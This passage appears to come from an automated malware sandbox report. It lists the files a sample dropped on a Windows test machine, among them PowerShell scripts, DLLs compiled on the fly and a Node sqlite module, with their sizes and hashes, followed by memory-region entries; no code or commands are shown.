                                                                                                                                                                                                                                                cebaa9795b2039a5784a0edcbf89cb298259a34c5aa7f89ba31344203ea37a81

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                1d44780b537d2797aaa636d913e2fb5dc00484d3bf9cbf42a67c7cd7988ff756326e9725b832df85c0c2fb1bc7c25f1ffa66e9b3ae5127868f38a88546a7555d

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                446dd1cf97eaba21cf14d03aebc79f27

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                ca24df1817fa1aa670674846e5d41614

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                dac66ea013bcc46d24f1ece855568187c6080eaf

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                64B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                5caad758326454b5788ec35315c4c304

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                3aef8dba8042662a7fcf97e51047dc636b4d4724

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                2KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                db7bf9eecdd39389a66535a8ac628e24

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                d8c0f5e02def7a5634b5acaa3a4f8df17ade140a

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                8ad88571b5fa5db3ef1c85d1ebf9da4cbd80b3de832006818032be3445f1b049

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                a4224714354384ad3d93949450758fd6fc4245ac4f7ae8ad5b1cdda344d07351e84d5f0b484af87f6f8efcb43f21495c86e7f38df609892125ae3d32da9de0fa

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RES5EBA.tmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3fbfce0123b428b5360055fd3bd11294

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                f7d8b9e13afdc2376d3a304419d663da6aeac6a5

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                fdbdca3647994436d4b9290d63bcc0e5f764fd1d16b3585c5f50f29876f6141a

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                751e3b38ebcf3a54d7be67a91d62d8216f52507bd336f0d4eea277f820c96066ec4e9009132b585182a96cc9599a2c008e287e099216d78d49b60e67bae88f8d

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RES66B9.tmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                84a9e8a571fc6c340ead97084ab04c59

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                1797ef230ef78e292d5047de33acdaa1da55b1c5

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                8215e25725f23d4d00d22c4074faaa528b74442b820aad97c1b6a757f89345af

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                a03b3657e94b51d208901067b645b05ac6f67bb9d5e95e45f54e05d2ef982913a6c9ac3400f5bd04c46245cf8de73f08f255be12fb9ae6b7c279c05391c69b93

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n3aewzod.ior.ps1

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                60B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dpvs2wch\dpvs2wch.dll

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b0f08ad4ea1024ed3528f4ba33449ce9

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6e167bc97b5f00e42d21684ca8689ff2ef1c3a98

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                884e5815c7ac636379828ac9d771cc37fa5da59558e3c850ffccea6ca79d3c9c

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                7edd9d92ef65afd4403ea3e70df00bb30ca4c5b1518c3ee0f68acdc9b266c178d126ba21c31a434525ef509d2a95f9d0b63d9a1111fbbe8a997b0d099803950f

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                66a65322c9d362a23cf3d3f7735d5430

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                ed59f3e4b0b16b759b866ef7293d26a1512b952e

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\temp.ps1

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                379B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                18047e197c6820559730d01035b2955a

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                277179be54bba04c0863aebd496f53b129d47464

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zqvce3rl\zqvce3rl.dll

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                fa7625b76533f20f8d9a12d133138c81

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                563e00cd68be164beb10ea3ab6d0f4bb07ee411b

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                0a3f789b98501529fb95b973a1d59b7b64a6a0f32e981a255987e42ec4b422ac

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c81ab408101dc690e31631b9f4c62b78e818fda9a97149ca0f00cd3a967bb40b2019849738d5755280d8cace01f2e9f11d53e43d96bab79b1fe8b49c35f97fb7

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\dpvs2wch\CSC6D9D7E3A6EF94F89A5B5EE16383EA8FC.TMP

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                652B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                3f289421e504073d104904177cb624ee

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                e1cb6abca0b2affa35e0d051d1783f37a09e114f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                45087f0bae8e2b72412fbb574e1ea82cdfc20abd9d20febceb1b7778b9ae04b5

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                2b2586a828631aa1453c42657bab606d5a39166d394dd31f0ef8e99f44ec0d3462be617c169f085fec07efe31e2674ab1485fe917ba2bf5c3fb71b988c3d3c69

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\dpvs2wch\dpvs2wch.0.cs

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                311B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                7bc8de6ac8041186ed68c07205656943

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\dpvs2wch\dpvs2wch.cmdline

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                369B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                5e57517b03c31cab7545c04a630a498b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                a8ff724d6acc04a05abea09f276a9baf4a30bcb2

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                c7f499d0148bfdf9b4c7a5621c896f22987fe99ccb96bcdda843a5861d877eeb

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                c3ce001d149f5cace90183d9ba405d0623d81adf7a0fe4fd8c6667e970ee1c3ef53e2f8cfd4b698e7241bb845ee0deeb3f410568db43dd623c74297157102952

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\zqvce3rl\CSCC33968EFC2CC4291915FE8612F8BA90.TMP

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                652B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                9fd383c8a11bdb46e438b11e2742f0e1

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                6b3e1b08633e2c5417e179c0db5c13fdc17471c2

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                9e722bcd32673cac3d49c4eb68e42d38f3a871089de3dce2d9ab5150e7df8740

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                bc529b0b745c979c86e5f112edfe4128a7754473ba4cf6713ac0a44752df1cebda07b938b3e5492b5986d5c6366c9163cf2300dfe67f52ce544e9d5fbd8d6815

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\zqvce3rl\zqvce3rl.0.cs

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                426B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                b462a7b0998b386a2047c941506f7c1b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

                                                                                                                                                                                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\zqvce3rl\zqvce3rl.cmdline

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                369B

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                cf2ddae824c2c3a7ec570434a88d511f

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                65fb3fe8bc6fbe55fa5195784ed42677fff982f4

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                27d29f1cad9921906467a54ac5eda49b221da145dffe625dec8bbc270963e2bb

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                86feca02cde602ee6c32f75b77a01505127b3db9012f84662b3f883f2c6567c0ad3c622c7a45f16bda93a2e4fedd0a236df1bb1bbf0babd7500d757bb43a9733

                                                                                                                                                                                                                                              • memory/2492-187-0x000002361DEA0000-0x000002361DEA8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB

                                                                                                                                                                                                                                              • memory/2500-115-0x00000266545D0000-0x0000026654620000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                320KB

                                                                                                                                                                                                                                              • memory/4416-84-0x00007FFAFC000000-0x00007FFAFCAC1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                              • memory/4416-83-0x00007FFAFC000000-0x00007FFAFCAC1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                              • memory/4416-85-0x0000020FF1F70000-0x0000020FF1FB4000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                272KB

                                                                                                                                                                                                                                              • memory/4416-86-0x0000020FF2140000-0x0000020FF21B6000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                              • memory/4416-78-0x0000020FF1A80000-0x0000020FF1AA2000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                              • memory/4416-103-0x00007FFAFC000000-0x00007FFAFCAC1000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                                              • memory/4416-72-0x00007FFAFC003000-0x00007FFAFC005000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                              • memory/4416-99-0x0000020FF1BD0000-0x0000020FF1BD8000-memory.dmp

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                32KB